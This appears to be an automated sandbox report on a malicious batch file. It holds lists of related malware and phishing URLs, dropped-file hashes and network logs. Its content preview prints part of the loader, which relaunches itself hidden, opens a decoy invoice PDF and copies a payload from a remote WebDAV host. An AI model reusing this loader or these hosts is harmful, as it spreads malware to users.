                                                • 70.38.21.234
                                                https://greenwoodpark.com.au/hvilkes-receipt.zipGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                upload.vbsGet hashmaliciousVenomRATBrowse
                                                • 70.38.21.234
                                                update.vbsGet hashmaliciousXWormBrowse
                                                • 70.38.21.234
                                                windows.vbsGet hashmaliciousXWormBrowse
                                                • 70.38.21.234
                                                file.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                file.vbsGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                IWEB-ASCAfilePY.cmdGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                file py p.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                file py portable.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                fileEEE.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                IUzBqUNYMK.elfGet hashmaliciousUnknownBrowse
                                                • 174.142.183.68
                                                https://greenwoodpark.com.au/hvilkes-receipt.zipGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                https://opodo.onelink.me/RnQA?pid=CRM&af_adset=email&af_ad=crm_nl_PDA_SneakPeek_NP_X_290124__&is_retargeting=true&af_dp=op-app%3A%2F%2Flaunch%2F%3futm_content%3dUL_hero%26utm_source%3dsf%26utm_medium%3dcrm%26utm_campaign%3dnl%26utm_term%3dXX-XX-CRM-E-NL-PDA-FL-X-NP_PrimeDay8_NonPrime_SneakPeekAPP_290124_Render_435150%26mktportal%3dNL&af_web_dp=https://tunisianrentcar.tn/jo0eue/9761/new/new/dvader@hinckleyallen.com##Get hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                WDzkAh06Pf.elfGet hashmaliciousMiraiBrowse
                                                • 70.38.94.230
                                                DHL-2854-56463.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 107.161.75.133
                                                Statement of account.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 174.142.95.75
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                1138de370e523e824bbca92d049a3777http://hxjmm.check-tl-ver-154-2.comGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                http://all4promos.comGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                http://kerapoxy.ccGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                http://ahmetorak.com/neuromarketGet hashmaliciousHTMLPhisherBrowse
                                                • 23.206.229.209
                                                https://neuraxpharm.eurosbiolab.eu/?__cf_chl_rt_tk=TES3LKGEhjH1G5Ym.iTFDxwaSWwxOocOm2ySKfq7pJU-1716481117-0.0.1.1-1621Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                • 23.206.229.209
                                                https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:90c503cb-cf61-4be1-b108-1df5bcac434aGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                http://rb.gy/707sjfGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                http://info.ipreo.com/Privacy-Policy.htmlGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                https://lnk.sk/mzoyGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                https://miempresaessaludable.theobjective.comGet hashmaliciousUnknownBrowse
                                                • 23.206.229.209
                                                28a2c9bd18a11de089ef85a160da29e4new.cmdGet hashmaliciousGuLoaderBrowse
                                                • 2.19.85.159
                                                • 20.114.59.183
                                                filePY.cmdGet hashmaliciousUnknownBrowse
                                                • 2.19.85.159
                                                • 20.114.59.183
                                                https://t.co/PmbTTSQ6z4Get hashmaliciousUnknownBrowse
                                                • 2.19.85.159
                                                • 20.114.59.183
                                                b23c466-Payment Reciept May 22 2024.htmlGet hashmaliciousUnknownBrowse
                                                • 2.19.85.159
                                                • 20.114.59.183
                                                https://www.flipsnack.com/C65D7DCC5A8/sw-bruce-limited/full-view.htmlGet hashmaliciousUnknownBrowse
                                                • 2.19.85.159
                                                • 20.114.59.183
                                                https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1Get hashmaliciousUnknownBrowse
                                                • 2.19.85.159
                                                • 20.114.59.183
                                                https://www.google.com/url?q=https://tame-coherent-emmental.glitch.me/%23aG95ZUB1bW4uZWR1&source=gmail-imap&ust=1717088881000000&usg=AOvVaw14q68JL0hvqaGr_XiCkvK4Get hashmaliciousHTMLPhisherBrowse
                                                • 2.19.85.159
                                                • 20.114.59.183
                                                http://all4promos.comGet hashmaliciousUnknownBrowse
                                                • 2.19.85.159
                                                • 20.114.59.183
                                                http://qcqsn.drivers-hp-dell-asus.ru/4Clxwy9769ZIGi545pwqtzclyna14499EAEPPODKZHNKREZ30JPNY13019f17Get hashmaliciousPhisherBrowse
                                                • 2.19.85.159
                                                • 20.114.59.183
                                                http://kerapoxy.ccGet hashmaliciousUnknownBrowse
                                                • 2.19.85.159
                                                • 20.114.59.183
                                                No context
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 23 18:07:29 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2673
                                                Entropy (8bit):3.9831154024425457
                                                Encrypted:false
                                                SSDEEP:48:8qLdFTEQHcidAKZdA1P4ehwiZUklqehTy+3:8UgvOoy
                                                MD5:3373BE2E65A5B67A6573BD5937B77B02
                                                SHA1:10A6317F361C80BF6B800215FB3D8A004F9FF01B
                                                SHA-256:2ED6939A3DE110939FE808B497EB8CF8D63ABDD34D7D92144F934034896F3DFE
                                                SHA-512:C6D04C838AB32735F8760A937EDA22989FD88F0A6D025035BDE40931BDE9217934F142CEC09FD87A3D76B54C19CBCFDEF75F4AD3925A49B7D733F132C4340CAB
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,......,uD.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 23 18:07:29 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2675
                                                Entropy (8bit):3.999383872021734
                                                Encrypted:false
                                                SSDEEP:48:8wdFTEQHcidAKZdA1+4eh/iZUkAQkqehYy+2:8qgeF9Q1y
                                                MD5:0966C44F27807C24CB5D7AD1ADBB9E92
                                                SHA1:E43F284C77E3F1DACAC7A19378164DD0D2D78888
                                                SHA-256:C9B3002A461B1D63F17F0F764CB1507E0CD44A7D6017AB0A398A28DC81AA6CC2
                                                SHA-512:B51028C4EEAA93A2B34F922523B47C576071005B91D130B8CF7ECCDB521ECD92BF7682D04EFFAAF7A3E5037F6E800A5C17CF419D8D15FF5BB5B594229FB88540
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,....)..uD.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:56:51 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2689
                                                Entropy (8bit):4.00901776574024
                                                Encrypted:false
                                                SSDEEP:48:8DdFTEVHcidAKZdA1404eh7sFiZUkmgqeh7sSy+BX:83ggInsy
                                                MD5:EB02143C37F7F70B20C448A007BB4A93
                                                SHA1:C75EF3213C916B9121B7F67215AFF4B2F1272C1D
                                                SHA-256:99423DBD82D50D6ED46E2A4FB55F1C92ED2648D756B4EC7B337E963215DC4E00
                                                SHA-512:25AC955B4FA0B00BB14626A274E4B29E13A90702C4A31F8021A8D474356EB1F303F0EC5A907C09E52F37A3345E59394E2A03A93AE2EFB68E8AB2E59FACA4DA6B
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,.....<}.i.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VEW.F...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 23 18:07:29 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2677
                                                Entropy (8bit):3.996620153697733
                                                Encrypted:false
                                                SSDEEP:48:8RdFTEQHcidAKZdA1p4ehDiZUkwqeh0y+R:8JgJ5ay
                                                MD5:AA52651BE20AB2F63F0D26F05BE17E8F
                                                SHA1:1F299EA553C056C966F9454D5101C93C1574603A
                                                SHA-256:4DDA56F6B83EB7F4A08800EB43DD3FDE6E5B1C1A43A4EB36F763A7481A6B1E08
                                                SHA-512:83EC06193B844C0B104BDFA78AD4CDF9DE510B9B86BE1C20CC52B4D4C64657EA6BAB812BD56C279ADAC7846812AC6627AFAC91E988C3C6D6C87D26B2618FF89B
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,....`..uD.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 23 18:07:29 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2677
                                                Entropy (8bit):3.9867109874874265
                                                Encrypted:false
                                                SSDEEP:48:8MdFTEQHcidAKZdA1X4ehBiZUk1W1qehGy+C:82g3b9my
                                                MD5:831B133CD55443BC9A7053050E34FCE6
                                                SHA1:E586FA379A544890F711ADF5512FBD4AA8C19CF2
                                                SHA-256:268EFE879B0E423DB7A34196C2C9C7237B729D249CF27683A26AB7631CDED24C
                                                SHA-512:6CE3E119D68895D55311A8E615DCBF9187129A5F7F8E5C08CC8B40DE698440616F77CE0084DE26FE2B0C605223FAD96A94E75823DEF09B2998B944ED95ECB02A
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,......%uD.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu May 23 18:07:29 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2679
                                                Entropy (8bit):3.9951662133706987
                                                Encrypted:false
                                                SSDEEP:48:8YdFTEQHcidAKZdA1duTc4ehOuTbbiZUk5OjqehOuTbsy+yT+:8ygwTcJTbxWOvTbsy7T
                                                MD5:DD2AEA631D7515AFAE23F749A9F762E4
                                                SHA1:D20A29D3F13C72585B983CA9BB6DB3CDCE13ED85
                                                SHA-256:6712B1A45E3D1AA680D63A9C7C2A7D3B6F778E7DB897BD9196098CBF41C0DA04
                                                SHA-512:5B6483ECE31AEC130DC1CDB41BA31FC4B695AF7E66D51ABAB69C4BF3A461ECE2629173FC0F374163481D9266B837B8364B967B7A60AC569F8CF73CE93CE0AA44
                                                Malicious:false
                                                Reputation:low
                                                Preview:L..................F.@.. ...$+.,.....`.uD.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I.X.....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V.X.....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V.X..............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V.X............................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):315
                                                Entropy (8bit):5.0572271090563765
                                                Encrypted:false
                                                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                URL:https://s2r.tn/favicon.ico
                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:HTML document, ASCII text
                                                Category:downloaded
                                                Size (bytes):315
                                                Entropy (8bit):5.0572271090563765
                                                Encrypted:false
                                                SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR
                                                MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                Malicious:false
                                                URL:https://s2r.tn/cgi/INVOICERVSHA.pdf
                                                Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.
                                                File type:DOS batch file, ASCII text, with CRLF line terminators
                                                Entropy (8bit):5.041379261744134
                                                TrID:
                                                  File name:file.cmd
                                                  File size:1'473 bytes
                                                  MD5:21737449c6f74e5e1189d703b6591d0f
                                                  SHA1:b09e319ed020ba959a1eee66897dfdd17d66b2d0
                                                  SHA256:8604af0ca2b410192af9b078386dceede67ffddc7a467fb4bec39173e69f94bd
                                                  SHA512:3cc90489382f076894c911988ce49e20f0f5b3953bc8768cdf4565fa6f26bed905b22950b12ac483ca09ab1ea7d12c13503c6033d247a0702540f7da8886c794
                                                  SSDEEP:24:lHtNBd0zOTSMVgAqKwoxwbXn6omx4nXX6kkx4XHG4x7XmdrRbXpQjQZhQelQHnu/:FBdqXrPox2XZmx4nn3kx43Px72drXQjC
                                                  TLSH:4A310C93511D8160A2A67AF6D73C16BFAD1810C5D201390860E6D5FF1637D45A3BBAF8
                                                  File Content Preview:@echo off..if "%1" == "" start "" /min "%~f0" MY_FLAG && exit....set source=\\185.29.11.28@9999\DavWWWRoot\google\file..set desusertion=%USERPROFILE%\Pictures....echo Opening PDF file.....start "" "https://s2r.tn/cgi/INVOICERVSHA.pdf"....echo Copying upda
                                                  Icon Hash:9686878b929a9886
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  May 23, 2024 21:07:16.605169058 CEST49677443192.168.2.920.189.173.11
                                                  May 23, 2024 21:07:16.620831013 CEST49673443192.168.2.9204.79.197.203
                                                  May 23, 2024 21:07:17.808320045 CEST49677443192.168.2.920.189.173.11
                                                  May 23, 2024 21:07:19.855237961 CEST49676443192.168.2.923.206.229.209
                                                  May 23, 2024 21:07:19.855345011 CEST49675443192.168.2.923.206.229.209
                                                  May 23, 2024 21:07:20.136506081 CEST49674443192.168.2.923.206.229.209
                                                  May 23, 2024 21:07:20.214689970 CEST49677443192.168.2.920.189.173.11
                                                  May 23, 2024 21:07:25.027138948 CEST49677443192.168.2.920.189.173.11
                                                  May 23, 2024 21:07:26.230313063 CEST49673443192.168.2.9204.79.197.203
                                                  May 23, 2024 21:07:29.099370003 CEST49711443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.099410057 CEST4434971170.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.099611998 CEST49711443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.099972010 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.100012064 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.100070000 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.100425005 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.100435972 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.100568056 CEST49711443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.100579977 CEST4434971170.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.469408989 CEST49676443192.168.2.923.206.229.209
                                                  May 23, 2024 21:07:29.469420910 CEST49675443192.168.2.923.206.229.209
                                                  May 23, 2024 21:07:29.628926039 CEST4434971170.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.629385948 CEST49711443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.629410982 CEST4434971170.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.630644083 CEST4434971170.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.630705118 CEST49711443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.631237030 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.653450012 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.653497934 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.654457092 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.654536963 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.654836893 CEST49711443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.655065060 CEST4434971170.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.655621052 CEST49711443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.655631065 CEST4434971170.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.656110048 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.656310081 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.705027103 CEST49711443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.705028057 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.705044031 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.749233007 CEST49674443192.168.2.923.206.229.209
                                                  May 23, 2024 21:07:29.749248981 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.815066099 CEST4434971170.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.815156937 CEST4434971170.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.815238953 CEST49711443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.817861080 CEST49711443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:29.817877054 CEST4434971170.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:29.960221052 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:30.006496906 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:30.081866026 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:30.081938028 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:30.081990004 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:30.130822897 CEST49712443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:30.130844116 CEST4434971270.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:30.230648994 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:30.230690956 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:30.230756998 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:30.231601000 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:30.231635094 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:30.739367008 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:30.740206003 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:30.740231991 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:30.741343021 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:30.741760969 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:30.741919994 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:30.741961002 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:30.786495924 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:30.795387983 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:30.922672033 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:30.922894001 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:30.922950983 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:30.923953056 CEST49714443192.168.2.970.38.21.234
                                                  May 23, 2024 21:07:30.923984051 CEST4434971470.38.21.234192.168.2.9
                                                  May 23, 2024 21:07:31.397636890 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:07:31.397665977 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:07:31.397725105 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:07:31.397922039 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:07:31.397929907 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:07:31.441894054 CEST4434970423.206.229.209192.168.2.9
                                                  May 23, 2024 21:07:31.442100048 CEST49704443192.168.2.923.206.229.209
                                                  May 23, 2024 21:07:32.097558975 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:07:32.097830057 CEST49716443192.168.2.9142.250.181.228
                                                  May 23, 2024 21:07:32.097851992 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:07:32.098958969 CEST44349716142.250.181.228192.168.2.9
                                                  May 23, 2024 21:07:32.099024057 CEST49716443192.168.2.9142.250.181.228
